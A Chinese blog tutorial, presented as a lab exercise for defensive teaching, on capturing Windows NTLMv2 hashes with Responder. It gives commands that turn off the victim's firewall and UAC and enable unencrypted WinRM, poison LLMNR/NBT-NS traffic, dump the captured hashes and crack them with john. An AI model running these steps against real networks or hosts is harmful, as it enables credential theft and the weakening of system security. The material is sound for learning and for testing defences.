首页 > 编程知识 正文

responder什么意思,first responder

时间:2023-05-04 15:31:01 阅读:268121 作者:4044

作者:痴情的战斗机
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

Responder捕获Win哈希 实验环境Responder安装ResponderResponder参数获取NTLMv2哈希

实验环境

VM搭建的虚拟测试环境
1.被攻击win7主机192.168.1.130
2.kali 192.168.1.131
3.win7配置

netsh advfirewall set allprofiles state offwinrm quickconfigwinrm set winrm/config/service/auth @{Basic="true"}winrm set winrm/config/service @{AllowUnencrypted="true"}reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f重启 Responder

responder 这个工具会回答发出的LLMNR和NBT-NS查询,诱使受害者主机提供Net-NTLM哈希。
该工具一般只针对SMB的文件服务器服务请求

安装Responder

Responder在kali中已经内置,但版本更新可能不及时,最好自己进行下载更新
先配置好生成工具等环境

apt-get install build-essential git python-dev

从github下载源码

git clone https://github.com/lagandx/Responder.gitcd Resopnder/git pull Responder参数

Resopnder有很多参数
-I 设置监听的网络接口,eth0
-f 收集NBT_NS或LLMNR的信息
-w 设置WPAD服务器

获取NTLMv2哈希

1.开始毒化,监听请求信息

./Responder.py -wfF -I eth0


此时kali已经毒化完成,并监听信息。
2.使用被攻击主机随意访问域内共享文件,或访问域内主机

时已经获取到了被攻击主机的哈希值
3.CTRL+C进行结束进程,使用./DumpHash.py导出捕获的哈希值

./DumpHash.py


此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt。
4.破解hash密码
使用Hashcat或者john等密码破解工具进行破解

john DumpNTLMv2.txt


破解出用户名hacker,密码password1

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。